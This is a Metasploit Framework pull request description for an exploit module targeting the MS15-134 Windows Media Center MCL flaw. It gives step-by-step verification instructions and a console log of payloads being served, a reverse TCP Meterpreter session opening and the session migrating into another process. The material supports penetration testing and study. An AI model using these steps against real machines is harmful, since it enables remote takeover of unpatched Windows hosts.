rapid7/metasploit-framework
# Add MS15-134 Microsoft Windows Media Center MCL Self-Executing Vulnerability

## What This Module Does

This module exploits a vulnerability found in Windows Media Center. It allows an MCL file to render itself as an HTML document in the local machine zone by Internet Explorer, which can turn into arbitrary code execution.
## Verification Steps
- [ ] Start a Windows 7 SP1 box unpatched
- [ ] Do: `use exploit/windows/misc/ms15_134_mcl`
- [ ] Do: `run`
- [ ] Drag and drop the msf.mcl file to the Win 7 box
- [ ] Double click on the msf.mcl file
- [ ] There will be a security prompt asking you to interact with ActiveX, **click Yes**.
- [ ] You should get a session

Notes:
- If you're on a more up to date Windows 7 box, you might get another ActiveX prompt.
- You will see that the module is unable to delete an .exe file (that is the payload), this is expected.
## Demo

```
msf exploit(ms15_134_mcl) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.23.1:4444 
msf exploit(ms15_134_mcl) > [*] Using URL: http://172.16.23.1:8080/g7cKKOn9MH4u
[+] msf.mcl stored at /Users/wchen/.msf4/local/msf.mcl
[*] Manually pass msf.mcl to the target you wish to exploit.
[*] If you wish to change the file name msf.mcl to something else, make sure
[*] to update the url attribute in the file to have a matching name as well.
[*] Server started.
[*] 172.16.23.157    ms15_134_mcl - Serving CAB file (213) bytes
[*] 172.16.23.157    ms15_134_mcl - Serving recordset file (307 bytes)
[*] 172.16.23.157    ms15_134_mcl - Serving JavaScript file (831 bytes)
[*] 172.16.23.157    ms15_134_mcl - Serving EXE file (73802 bytes)
[*] Sending stage (957487 bytes) to 172.16.23.157
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.157:49714) at 2016-02-11 19:21:22 -0600
[*] mshta.exe terminated.
[*] ehshell.exe terminated.
[*] explorer.hta removed.
[*] bmoo.cab removed.
[-] Unable to remove C:\Users\sinn3r\AppData\Local\Temp\iUhLpc.exe (stdapi_fs_delete_file: Operation failed: Access is denied.)
[*] Session ID 1 (172.16.23.1:4444 -> 172.16.23.157:49714) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iUhLpc.exe (3148)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4320
[+] Successfully migrated to process 
```
